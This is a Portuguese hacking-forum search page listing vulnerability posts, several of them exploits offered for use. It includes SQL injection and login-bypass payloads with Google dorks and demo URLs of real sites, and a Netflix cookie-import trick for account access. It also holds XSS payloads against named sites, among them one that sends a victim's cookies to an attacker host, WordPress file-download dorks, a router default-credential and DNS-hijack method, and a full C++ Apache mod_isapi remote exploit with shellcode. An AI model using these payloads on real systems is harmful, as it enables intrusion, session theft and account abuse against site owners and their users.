Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

Pesquisar na Comunidade: Mostrando resultados para as tags ''[VULNERABILIDADE]''.

  • Pesquisar por Tags

    Digite tags separadas por vírgulas
  • Pesquisar por Autor

Tipo de Conteúdo


Fóruns

  • Anúncios da Administração
    • Regras
    • Avisos
  • Hacking
    • Leaks
    • Malware
    • Exploits
    • Deface
    • Programas
    • DESATUALIZADO
  • Programação
    • Lógica de Programação
    • Linguagens
    • Mobile
  • Redes
    • DDoS
    • DDoS Mitigation
    • Proxies/VPN
    • Geral
  • Papers
    • Programação
    • Hacking
    • Redes
  • Estudo
    • Grupos de estudo
    • Hardware
    • Software
  • Design
    • Geral
  • Off-Topic
    • Discussões Gerais
    • LeakedLoL
  • Carding/Banking
    • Aprovações
    • Checkers / Testadores
    • Telas
    • DESATUALIZADO

Categorias

  • Files

Encontrado 25 registros

  1. [VULNERABILIDADE]

    Hiiiiiiiae meus friends, dessa vez nada de muito op, só um "bypass", digamos assim, básico pra Netflix. 1 - Baixe a extensão "EdiThisCookie" para Chrome. (https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=pt-BR) 2 - Copie esse " - script - " que vou deixar aqui no Ghostbin. (https://ghostbin.com/paste/qrhjw) 3 - Esses cookies, darão o acesso direto a página, com usuários públicos. 4 - Entra no login da Netflix. (https://www.netflix.com/br/Login) 5 - Clica no ícone da extensão (Biscoitinho do lado da url) 6 - Insira os cookies na aba "Importar Cookies". 7 - Agora volte para a página principal. 8 - Automaticamente, vai aparecer a seleção de users, escolhe um e GG.
  2. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: SQL injection & Admin Page Bypass |[+] |[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR |[+] |[+] Vendor Homepage: http://websector.ge/ |[+] |[+] Google Dork:intext:"websector.ge" inurl:php?id= |[+] Google Dork:????? ???????????? WebSector.ge-?? ???? |[+] |[+] Tested on: Windows 7 |[+] |[+] Date: 06/12/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Username: '=' 'or' |[+] Password: '=' 'or' |[+] |[+] Admin Url :- |[+] |[+] http://Site.ge/admin/ |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+]http://www.turugeorgia.com/index.php?page=tour_single&id=34 |[+]http://ertobaplus.ge/index.php?page=product&catid=35 |[+]http://orbita.ge/index.php?page=pages&id=6 |[+]http://www.vitamin.ge/index.php?page=projects_single&id=95 |[+]http://www.hauck-georgien.com/index.php?page=products&cat=4
  3. não sei se postei na área errada, qualquer coisa pode mover o tópico ou fechar ... créditos : esse canal ai do vídeo flw
  4. ########################## # Exploit Title: Ausführliche TV-Tipps SQLi Vulnerability # Google Dork : intext:" Ausführliche TV-Tipps ansehen." # Discovered By: #Thecenahmet # Vendor Homepage : .. ########################## # {DEMO} http://www.dubdb.de/tv.php?start=0 [Vuln Page] tv.php?start= [Admin Page] http://localhosthttp/admin-login.php ###################################
  5. ########################## # Exploit Title: Quanto Soluções & Sistemas SQL injection Vulnerability # Google Dork : intext:"Quanto Soluções & Sistemas - Todos os direitos reservados" # Discovered By: #Thecenahmet # Vendor Homepage : http://www.quantosistemas.com.br/ ########################## # {DEMO} http://www.bancariosprudente.org.br/site/banco.php?ver=1 [Vuln Page] banco.php?ver=[SQLi] [Admin Page] http://localhost/admin/login.php ###################################
  6. ########################## # Exploit Title: Creation et Promouvoir de votre site web SQL injection Vulnerability # Google Dork : intext:"Creation et Promouvoir de votre site web" # Discovered By: #Thecenahmet # Vendor Homepage : http://www.f3designs.ca/ ########################## # {DEMO} http://foxweb.fr/index.php?lang=EN [Vuln Page] index.php?lang=EN [Admin Page] http://localhost/admin/login.php http://localhost/admin/ ###################################
  7. ########################## # Exploit Title: Luis Bernardo SQL injection Vulnerability # Google Dork : intext:"Created by Luis Bernardo" # Discovered By: #Thecenahmet # Vendor Homepage : ########################## # {DEMO} http://www.ateneutennisclub.us/player/form_see_player.php?id_player=89 [Vuln Page] http://localhost/player/form_see_player.php?id_player=89 [Admin Page] http://localhost/admin/login.php ###################################
  8. ########################## # Exploit Title: internetburo SQL injection Vulnerability # Google Dork : intext:": INTERNETBURO.RU" # Google Dork 2 : intext:"INTERNETBURO.RU" inurl:"id=" # Discovered By: #Thecenahmet # Vendor Homepage : http://www.internetburo.ru/ ########################## # [Admin Path] http://www.target.com/admin/login.php [Vuln.] news/?id=22&show=item {DEMO} http://www.cmot.ru/ http://cst-prom.ru/ http://www.zentr-sto.narod.ru/ ###################################
  9. [VULNERABILIDADE]

    De XSS para RCE 2.5 - (Black Hat Europa Arsenal 2016) Demonstração versão 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj Requisitos: Python (2.7. *, Versão 2.7.11 foi usado para desenvolvimento e demonstração) Gnomo Bash Msfconsole (acessível através de variáveis de ambiente) Netcat (nc) CURL (curl) [NOVO] PyGame (apt-get install python-pygame) [NOVO] Compatibilidade de carga útil: Chrome (14 Nov 2015) - Isso ainda deve funcionar. Firefox (04 Nov 2016) - Testado ao vivo no Black Hat Arsenal 2016 WordPress Lab: WordPress: http://wordpress.org/ Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip Opcional: WPSEO https://yoast.com/wordpress/plugins/seo/ WordPress Exploit: http://www.exploit-db.com/exploits/27290/ Joomla Lab: Joomla: https://www.joomla.org/ SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip Joomla Exploit: https://www.exploit-db.com/exploits/39879/ Diretórios: Áudio: Contém notificações de áudio remixadas. Exploits: Contém explorações de escalação de privilégios DirtyCow (DCOW). Joomla_Backdoor: Contém um exemplo de backdoor de extensão do Joomla que pode ser carregado como um administrador e subsequentemente usado para executar comandos arbitrários no sistema com o sistema ($ _ GET [ 'c']). Payloads / javascript: Contém as cargas úteis de JavaScript. Contém um novo "add new admin" payload para Joomla. Shells: Contém os shells do PHP para injetar, incluindo uma versão ligeiramente modificada do shell do pentestmonkey que se conecta via wget. Download XSSER: https://github.com/Varbaek/xsser Desenvolvido por: Hans-Michael Varbaek Créditos: MaXe & Eletroplus & InterN0T
  10. ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |--------------------------------------------------------------------------------| |[+] Exploit Title: SQL injection Vulnerability |[+] |[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR |[+] |[+] Google Dork:"Designed by WEBRIDGES" inurl:php?id= |[+] |[+] Tested on: Windows 7 |[+] |[+] Date: 29/11/2016 |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.eshopper.dx.am/product-details.php?id=10000 |[+] |--------------------------------------------------------------| |[+] Thanks: CXSECURITY.COM Team's Members |[+] |[+] |[+] |[+] Url : http://pagebin.com/G2V7JVOW |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||
  11. ######################### # Exploit Título: desh universal SQL injection Vulnerability # Google Dork : intext:"Design & Development by Desh Universal" inurl:php?id= # Homepage : http://deshuniversal.com/ ########################## # {DEMO} http://www.dcgpsc.edu.bd/notice_details.php?id=31' http://dupl2000.com/dcgpsc/other_details.php?id=9' https://www.dcc.edu.bd/all-teacher.php?id=4' ################################### #Thanks to : Shayan 72 - hack4lx # Créditos: Mr.voltage
  12. #Exploit/Dork Título : Powered by StudioNET SQL Injection #Google Dork : intext:"Powered by StudioNET" inurl:php?id= #Data : 28.11.2016 #Testado em : Windows 7/10 / Kali Linux # ############################################# #Demonstração : # http://www.garcia-s.com/ver_producto.php?id=37 http://www.pastranasproduce.com/e_RECETAS.php?mod=ver&id=4 # Créditos: Shigi #
  13. [VULNERABILIDADE]

    Abuso de Autoridade Sigam: https://twitter.com/Eletroplus No início de um URL encontra-se um lugar esquecido útil para ocultar coisas, logs do servidores. É a parte de autenticação da seção de autoridade. Verifique o esquema de URL completo abaixo. Diferentemente da parte do fragmento, onde podemos usar propriedades de documento como location.hash para armazenar coisas que nunca serão enviadas para o servidor, as informações do usuário serão enviadas, mas não aparecerão nos logs por motivos de segurança. Assim torna-se outro bom lugar para colocar código javascript: http://alert(1)@Eletroplus.org/XSS/test.php?p=<svg+onload=eval(URL.slice(7,15))> Usando uma fatia da string retornada pela propriedade window.URL, começando de char 7 para char 15, passamos para eval () a string que queremos executar. Para um site habilitado para https, a combinação correta seria 8 e 16, respectivamente. Depois dele, não haverá nenhum vestígio do que realmente aconteceu na barra de endereços do navegador. O mesmo pode ser feito com a propriedade location do documento se eval () não estiver disponível. http://javascript:alert(1)@Eletroplus.org/xss/test.php?p=<svg+onload=location=URL.slice(7,26)> Mas muito mais prejudicial é usar essa habilidade para realmente fazer algum tipo de autenticação. Como a vítima de um ataque XSS pode executar solicitações para endereços IP internos, é possível girar para dispositivos acessíveis somente à vítima. A maioria dos roteadores SOHO (Small Office / Home Office) normalmente são vulneráveis a ataques de login por esse canal, então tudo o que um atacante tem que fazer é adivinhar o caminho certo em uma pequena lista de credenciais padrão comuns. Depois, ele prossegue com um ataque básico do CSRF para adicionar seu próprio servidor DNS à configuração do roteador, conseguindo um controle total sobre a rede da vítima. Para testar o seu próprio roteador (Firefox ou Chrome). Se depois de colar "http://admin:admin@192.168.0.1/" no navegador e o painel de controle do roteador aparecer, você pode estar com problemas sérios!. http://admin:admin@192.168.0.1/ Créditos: Eletroplus
  14. Então rapazes creio que a maioria já ouviu falar da plataforma wordpress certo. Nesse vídeo irei mostrar como obter informações usando uma ferramenta que já vem em alguns OS de pentest : Wpscan. Iremos obter usuário, e criar uma wordlist para descobrir a senha, bom o famoso força bruta. Qualquer dúvida chame privado.
  15. [VULNERABILIDADE]

    E aí galera, vou deixar um tópico bastante interessante aí pra vocês! Deixem seus UP. Essa dica não requer nenhum aplicativo hacker , nem configurações avançadas, pois isso se trata apenas de uma promoção da vivo que dá 10MB para quem assistir videos dos seus patrocinadores, tudo que tem que fazer é acessar o site " vivo.ddivulga.com " e se você for eleito a ganhar os 10MB irá aparecer um vídeo de patrocinador de 30 segundos,(Esse site não precisa internet para acessa-lo porém os dados móveis terá que está ativado, Se você tiver internet não se preocupe nem o site nem o vídeo irá consumir seus dados.O sinal wifi não pode estar ligado ou caso contrário não será elegível a promoção) em seguida terá que responder sobre o que era o vídeo, agora é só esperar que logo uma mensagem de texto chegará no seu celular avisando que você ganhou os 10MB.Você pode ver os videos quantas vezes ele tiver disponível, porém os dados não são acumulativos, ou seja só irá ganha mais 10MB quanto os primeiros 10MB que pegou acabar.A princípio 10MB é pouco ,mais se você estiver em uma emergência e quer mandar alguma mensagem onde não tem wifi e seus dados acabaram 10MB é uma mão na roda, ou então se você quer baixar um app que seja maior de 10MB pode fazer o seguinte, comece a baixar e quando chegar nos 10MB o download irá parar , ai você volta no site vê o vídeo ganha os 10MB e o download irá começar de onde parou , faça isso até baixar o arquivo. Créditos: Site Informática
  16. [VULNERABILIDADE]

    Antes de tudo: Esse tutorial é somente para estudo/conhecimento, o que você faz com ele é problema seu, eu não me responsabilizo pelo seus atos e danos fmz ? Tutorial Exploiter Config Download Tool Wordpress Vulnerability o tutorial é simples você vai no tio google.com e vai colocar uma dessas dorks abaixo inurl:wp-content/plugins/revslider/ inurl:revslider inurl:revslider_admin.php inurl:revslider_front.php inurl:plugins/revslider/ intext:Powered by Revslider intitle:"Index Of/ revslider" intitle:"Index Of/wp-content/themes/revslider" intitle:"Index Of/wp-content/plugins/revslider" intitle:"Index Of/admin/revslider" intitle:"Index Of/fr/revslider" intitle:"Index Of/en/revslider" intitle:"Index Of/us/revslider" intitle:"Index Of/ar/revslider" intitle:"Index Of/es/revslider" intitle:"Index Of/de/revslider" vai encontrar isso clique em qualquer um e você vai ser redirecionado pra cá ---------------------------------------------------------------------------------------------------------------------------------------------//------------------------------------------------------------------------------------------------------------------------------------------ Tutorial WordPress Theme ypo-theme Arbitrary File Download Vulnerability O procedimento é o mesmo acima o que vai mudar é o código inurl:/wp-content/themes/ypo-theme/ Creditos:Defalt Dz
  17. [VULNERABILIDADE]

    2 métodos para XSS simples mas funcionais e muitos servidores. Aproveitem Titulo: AKP Meda Design Admin Panel XSS Desenvolvedores: Sonny/Eletroplus/akpwork Vul: /admin/index.php?msg=<AQUI> Exemplo: http://www.insightradiology.com.au/admin/index.php?msg= Titulo: JMS Support Online Module XSS Desenvolvedor: Joommasters App Versão: 2.0 Joomla Version: Joomla 3.1 Vul: sendmessage.php?type=skype&user=<AQUI>&skype=<AQUI> Exemplo: https://www.webgobe.com/modules/mod_jms_support/sendmessage.php?type=skype&user=User&skype=
  18. [VULNERABILIDADE]

    O que é XSS ? Cross-site scripting (XSS) É o nome da vulnerabilidade mais comum em site de grande porte da web e o método de exploração. Os ataques XSS abusam da maneira dinâmica como os sites interagem com seus clientes, navegadores. Possibilita, para um atacante, controlar o navegador da vítima e sua interação com um determinado site vulnerável. Para exibir o conteúdo fornecido ou controlado por um usuário, como um parâmetro de URL ou um campo de entrada, um aplicativo com falhas abre a porta para a manipulação desse conteúdo. Esta manipulação, genericamente chamada injeção. Os navegadores exibem conteúdo usando uma mistura de HTML (basicamente uma linguagem de formatação de texto) e uma linguagem de programação chamada javascript. Entre outras coisas, javascript é responsável por fazer as coisas funcionarem em resposta a eventos no contexto de um aplicativo. Outra janela de abertura quando uma página carrega. O código Javascript vem entre as tags HTML, <script> e </ script> (as de abertura e fechamento, respectivamente) ou na forma de um externo incluem por meio do atributo "src" (fonte) desta mesma tag. Desta forma, bibliotecas (peças de código reutilizáveis) podem ser adicionadas à página atual e executadas pelo navegador nesse contexto. Assim, quando um atacante é capaz de injetar este par de tags em uma página, qualquer código javascript pode ser executado se não houver nenhum filtro no lugar (que geralmente é a grande maioria dos casos). Porque qualquer coisa que um usuário em um navegador pode fazer também pode ser feito por javascript, um invasor tem total controle sobre ele. Javascript também pode aparecer em elementos HTML comuns, as tags regulares. Por meio de manipuladores de eventos dentro deles, como "onload" (quando um elemento de página é carregado pelo navegador) ou "onmouseover" (quando um ponteiro do mouse paira sobre algo), código javascript também pode ser executado aumentando consideravelmente o número de vetores para um XSS ataque. Tipos de XSS ! Cross-site scripting pode ocorrer no contexto de um aplicativo ou não. Fora do contexto de uma aplicação é muito raro mas mais perigoso e não será coberto aqui. Com foco no aplicativo, o XSS pode ser causado pelo código do lado do servidor (código enviado pelo servidor web) ou pelo código do lado do cliente (código processado pelo navegador do código enviado pelo servidor da Web). Código enviado pelo servidor web é o código-fonte. Ele é processado pelo navegador, com a ajuda do mecanismo javascript, para criar os elementos do documento de forma programática. Isso é chamado de DOM (Document Object Model) e é gerado assim que chega o código-fonte. Portanto, temos tipos baseados em fonte e DOM de XSS em um contexto de um aplicativo. Ambos têm os seguintes tipos de execução. Source-based: Reflected Stored DOM-based: Reflected Stored Quando o site ou aplicativo reflete apenas o conteúdo maliciosamente manipulado pelo usuário (geralmente no URL), temos um ataque XSS refletido. Essa reflexão, como vimos, afeta a maneira como os navegadores exibem a página e como processam as coisas e se comportam. Pegue o seguinte código PHP: $username = $_GET[‘user’]; echo “<h1>Ola, ” . $username . “!</h1>”; Que exibiria o nome de usuário do URL como: http://eletroplus.com/ola.php?user=Eletroplus No código-fonte, seria: <h1>Ola, Eletroplus!</h1> Assim, se um atacante usar a URL "http://eletroplus.com/ola.php?user=<script>alert(1)</script>" ele poderá fazer com que o navegador gere o seguinte código-fonte : <h1>Ola, <script>alert(1)</script>!</h1> Além de acionar a caixa de alerta javascript clássico. Quando o site ou aplicativo armazena a entrada do usuário em um banco de dados ou em um arquivo para exibi-lo posteriormente, como um campo em um perfil ou um comentário em um fórum, o ataque resultante é chamado XSS persistente ou armazenado. Todo usuário que vê esse conteúdo armazenado é uma vítima potencial. Enquanto neste último ataque, um usuário só precisa abrir ou navegar para uma página infectada para ser atacado, o usuário geralmente deve clicar no link do atacante, que contém o que chamamos vetor ou carga útil, o código usado para o XSS ataque. Embora pareça menos perigoso do que a versão armazenada, um XSS também pode ser invisível incorporado em qualquer outro site e executa a partir de outra guia do navegador ou janela no contexto do aplicativo de destino. Exemplos básicos do XSS Geralmente, para uma prova de conceito (PoC) de um ataque XSS que explora falhas baseadas em fonte, os testadores de segurança usam um o código a seguir. 1. Com a tag <script> <script>alert(1)</script> ou <script src=//HOST/SCRIPT></script> Com HOST sendo um domínio ou endereço IP controlado por testador e SCRIPT sendo um script com alerta (1) como conteúdo, como em: <script src=//14.rs></script> 2. Com tags HTML normais (2.1 Baseado em eventos) <TAG EVENT=alert(1)> Com TAG sendo qualquer tag HTML ou XML e EVENT sendo um manipulador de eventos suportado como: <body onload=alert(1)> <img src=1 onerror=alert(1)> <svg onload=alert(1)> <x onmouseover=alert(1)> 2.2 Baseados em recursos <TAG RESOURCE=javascript:alert(1)> Com TAG sendo uma marca HTML adequada que suporta um recurso como: <iframe src=javascript:alert(1)> <object data=javascript:alert(1)> Todos estes fazem uma janela pop-up aparece com o número um dentro. Embora útil para mostrar a execução de javascript e, em seguida, a possibilidade de ligar o navegador para o controle, é melhor provar que a execução no contexto da aplicação. Para isso, "alert(1)" é alterado para "alert(document.domain)". Exemplo: <script>alert(document.domain)</script> Estes são apenas para provar a vulnerabilidade; Para ataques em estado selvagem, uma vítima de um ataque XSS normalmente não será capaz de ver nada enquanto seu navegador irá realizar as ações desejadas do atacante. 2. O que pode ser feito com XSS? Estas são só algumas ações que podem ser executadas por um invasor ao explorar uma falha XSS. 2.1. Roubar uma sessão de usuário no site vulnerável (incluindo administradores) <svg onload=fetch(‘//HOST/?cookie=’+document.cookie)> 2.2. Capture as teclas pressionadas pelo usuário 2.3. Deface a página, servindo qualquer tipo de conteúdo <svg onload=”document.body.innerHTML='<img src=//HOST/IMAGE>'”> 2.4. Enganar o usuário em dar suas credenciais por meio de um formulário HTML falso 2.5. Crashar o navegador (negação de serviço local) 2.6. Forçar download de arquivos <a href=//HOST/FILE download=FILENAME>Download</a> 2.7. Redirecionar o navegador do usuário para outro site onde sua máquina pode ser comprometida por ataques de memória <iframe src=//HOST/ style=display:none></iframe> É isto pessoal quer exemplos de muitos sites vuls xss e outras vulnerabilidades Siga: https://twitter.com/Eletroplus Créditos: Eletroplus
  19. 1°Passo tenha Google Chrome ou o Mozilla Firefox (recomendo o Mozilla) 2°Passo baixe a essa extensão(para quem está usando Google Chrome) e para quem está usando o Mozilla a baixe esse Add-ons Isso é nada mais nada menos que uma VPN para camuflar o ip e você poder fazer o seu download sem limite existe 4 regiões free é só escolher a que desejar 3°Passo após baixar a VPN executa-la (ela fica do lado direito do url) 4°Passo baixe os arquivos do mega sem limites (cheguei baixar 12GB sem parar)
  20. Salve rapazes nesse vídeo irei demonstra uns dos melhores scan desenvolvido pelo meu amigo cleiton. [ + ]NAME: Wordpress A.F.D Verification/ INURL - BRASIL [ + ]TIPE: Arbitrary File Download [ + ]Tested on: Linux [ + ]EXECUTE: php exploit.php www.target.gov.us [ + ]OUTPUT: WORDPRES_A_F_D.txt [ + ]AUTOR: Cleiton Pinheiro / NICK: GoogleINURL [ + ]EMAIL: inurllbr@gmail.com [ + ]Blog: http://blog.inurl.com.br [ + ]Twitter: https://twitter.com/googleinurl [ + ]Fanpage: https://fb.com/InurlBrasil [ + ] GIT: https://github.com/googleinurl [ + ]YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA [ + ] PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/ [ + ] Download Scanner INURLBR: [ + ]https://github.com/googleinurl/SCANNER-INURLBR [ + ]Exploit: [ + ]http://pastebin.com/ZEnbxXXd
  21. Olá antes de tudo esse é meu primeiro tópico aqui no fórum, irei postar alguns tutoriais do meu canal aqui. Visitem lá, então... Deixo esse vídeo de Default Password que postei algum tempo no canal, demostrando como subir a um shell enfim. Qualquer coisa chame privado ghostbin: [ x ] https://ghostbin.com/paste/yrme2/raw
  22. [VULNERABILIDADE]

    Olá, Segue code para sistema remoto Exploit, que explora a falha no Apache 2.2.14. #include <iostream> #include <windows.h> #include <winsock.h> #include <string> #include <direct.h> #pragma comment(lib, "wsock32.lib") using namespace std; #define SERVER_PORT 80 void header(); int createConnection(string targetAddr, int targetPort); int sendTransmission(string message); string recvTransmission(); void cleanUp(); WORD sockVersion; WSADATA wsaData; int sock; struct sockaddr_in rserver; int main(int argc, char *argv[]) { string serverIP, isapiDLL; string triggerVuln, payload; char accept[171], referer[733], cookie[5376], random[7604], postData[23379], footer[299]; //custom shellcode that writes "pwn-isapi" to "sos.txt" in the current working directory //Note: There are four NOPs at the end for padding. Not really needed. char shellcode[] = "\x31\xc0\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x56\x08\x8b" "\x7e\x20\x8b\x36\x66\x39\x4f\x14\x75\xf2\x66\xb9\x01\x6d\x66\x81\xe9\x94" "\x6c\x66\x39\x0f\x66\x89\xc1\x75\xe1\x89\xe5\xeb\x71\x60\x8b\x6c\x24\x24" "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" "\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1" "\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66" "\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61" "\xc3\xad\x50\x52\xe8\xaa\xff\xff\xff\x89\x07\x66\x81\xc4\x0c\x01\x66\x81" "\xec\x04\x01\x66\x81\xc7\x08\x01\x66\x81\xef\x04\x01\x39\xce\x75\xde\xc3" "\xeb\x10\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8\xcd\xff\xff\xff\xeb\x3b" "\xe8\xeb\xff\xff\xff\x6e\x7c\x2e\xe1\x1e\x3c\x3f\xd7\x74\x1e\x48\xcd\x31" "\xd2\x58\x88\x50\x07\xeb\x2f\x31\xd2\x59\x88\x51\x01\xeb\x2e\x51\x50\xff" "\x55\x04\xeb\x2c\x31\xd2\x59\x88\x51\x09\xeb\x33\x51\x50\x89\xc6\xff\x55" "\x08\x53\xff\x55\x0c\xe8\xd1\xff\xff\xff\x73\x6f\x73\x2e\x74\x78\x74\x4e" "\xe8\xcc\xff\xff\xff\x77\x4e\xe8\xcd\xff\xff\xff\xe8\xcf\xff\xff\xff\x70" "\x77\x6e\x2d\x69\x73\x61\x70\x69\x4e\xe8\xc8\xff\xff\xff\x90\x90\x90\x90"; header(); if (argc < 3) { printf("usage: %s <ip> <DLL>\n", argv[0]); return 1; } serverIP = string(argv[1]); isapiDLL = string(argv[2]); //all these values could be set to 7601 + sizeof(shellcode) //but mixing it up is good. memset(accept, 'A', 170); memset(referer, 'A', 732); memset(cookie, 'A', 5375); memset(random, 'A', 7603); memset(postData, 'A', 23378); memset(footer, 'A', 298); triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n" "User-Agent: AAAAAAAA\r\n" "Pragma: no-cache\r\n" "Proxy-Connection: Keep-Alive\r\n" "Host: " + serverIP + "\r\n" "Content-Length: 40334\r\n\r\n" + string(footer); //Modify the below request if needed (depending on where your function pointer is pointing) //Do so by adding or removing headers. So if you want to hit a higher function pointer, //keep adding headers :) //Note: If performing this blindly, try it a few times, change a bit, try again. //During testing i found that using a chunk of data the same size with the same header name //was more unreliable. In memory, large amounts of nulls are being placed either side of the //payload. Since the function pointer address was random, by slightly mixing up the size of //each header i would get better results. payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n" "Accept: " + string(accept) + "\r\n" "Referer: " + string(referer) + string(shellcode) + "\r\n" "From: " + string(cookie) + string(shellcode) + "\r\n" "Utruvh-guiergher: " + string(cookie) + string(shellcode) + "\r\n" "Accept-Language: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "Content-Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "UA-CPU: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "Pragma: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "User-Agent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "Cookie: " + string(cookie) + string(shellcode) + "\r\n" "Host: " + serverIP + "\r\n" "Proxy-Connection: Keep-Alive\r\n" "Okytuasd: " + string(cookie) + string(shellcode) + "\r\n" "Asdasdasdasdasd: " + string(random) + string(shellcode) + "\r\n" "Asdasda: " + string(random) + string(shellcode) + "\r\n" "Sewrwefbui: " + string(random) + string(shellcode) + "\r\n" "Qdfasdernu: " + string(random) + string(shellcode) + "\r\n" "Cdffew-asdf: " + string(random) + string(shellcode) + "\r\n" "Kuiytnb-Ehrf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Lsfergjnuibubiu: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Baefrwerifnhu: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Zdsfno: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Psdfsafn: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Zefwefnuivre-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Ivre-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Yvasde-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Yuionbsdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Yasdasdasdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "asdasdde-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Ertuioert-erf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Content-Length: 25054\r\n\r\n" + string(postData) + "CCCC" + string(shellcode) + "BBBB" + string(footer); //Setup connection if (createConnection(serverIP, SERVER_PORT) == 1) { printf("- an error occurred connecting to the server\n"); return 1; } printf("[+] Connected to %s.\n", serverIP.c_str()); printf("[+] Setting socket data structure values\n"); int iOptVal; int aiOptVal; struct linger linger_data; //This is meant to set closesocket to do a "graceful close", //however this is not the case when WSACancelBlockingCall() is called. A RESET packet is //sent as a result - Note that if in a vm, for some reason a RESET packet does not get sent. linger_data.l_onoff = 0; linger_data.l_linger = 0; setsockopt(sock, SOL_SOCKET, SO_LINGER, (char*)&linger_data, sizeof(linger_data)); setsockopt(sock, SOL_SOCKET, SO_DONTLINGER, (char*)&linger_data, sizeof(linger_data)); //Set SO_LINGER to 0 so WSACancelBlockingCall() will cause a RESET packet to be sent getsockopt(sock, SOL_SOCKET, SO_LINGER, (char*)&linger_data, &iOptVal); getsockopt(sock, SOL_SOCKET, SO_DONTLINGER, (char*)&linger_data, &aiOptVal); printf(" - SO_LINGER value is set to %ld\n", linger_data.l_onoff); printf(" - SO_DONTLINGER value is set to %ld\n", linger_data.l_linger); printf("[*] Triggering DLL unload\n"); sendTransmission(triggerVuln); Sleep(2000); //Sleep for a bit, otherwise on first run a RESET packet doesn't get sent. WSACancelBlockingCall(); //Cause reset packet response Sleep(2000); //The multiple Sleeps seem to break up stuff a bit, making it more reliable... closesocket(sock); Sleep(2000); WSACleanup(); Sleep(2000); printf("[+] The DLL should be unloaded by now\n"); //Reconnect to deliver payload if (createConnection(serverIP, SERVER_PORT) == 1) { printf("- an error occurred connecting to the server\n"); return 1; } printf("[*] Sending payload\n"); sendTransmission(payload); cleanUp(); printf("[+] Check to see if sos.txt was created...\n"); return 0; } void header() { printf("Apache 2.2.14 mod_isapi Remote SYSTEM Exploit (CVE-2010-0425)\n"); printf("-------------------------------------------------------------\n"); printf(" Brett Gervasoni (brettg [at] senseofsecurity.com.au)\n"); printf(" Copyright Sense of Security Pty Ltd 2010.\n"); } //Setup the server int createConnection(string serverIP, int port) { int result = 0, len = 0; sockVersion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsaData); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("error: socket()\n"); result = 1; } rserver.sin_family = AF_INET; rserver.sin_port = htons(port); rserver.sin_addr.s_addr = inet_addr(serverIP.c_str()); memset(&rserver.sin_zero, 0, 8); len = sizeof(struct sockaddr_in); if ((connect(sock, (struct sockaddr *)&rserver, sizeof(struct sockaddr_in))) == -1) { perror("error: connect()\n"); result = 1; } return result; } //Send a message int sendTransmission(string message) { int bytes_sent = 0; bytes_sent = send(sock, message.c_str(), message.length(), 0); if (bytes_sent < 0) { perror("error: send()\n"); exit(1); } return bytes_sent; } //Receive a message string recvTransmission() { string result; char *c = new char[1]; int bytes_recv = 0; while (c[0] != NULL) { bytes_recv = recv(sock, c, 1, 0); if (bytes_recv < 0) { perror("error: recv()\n"); //exit(1); } result += c[0]; } return result; } //Clean up the connection void cleanUp() { closesocket(sock); WSACleanup(); }
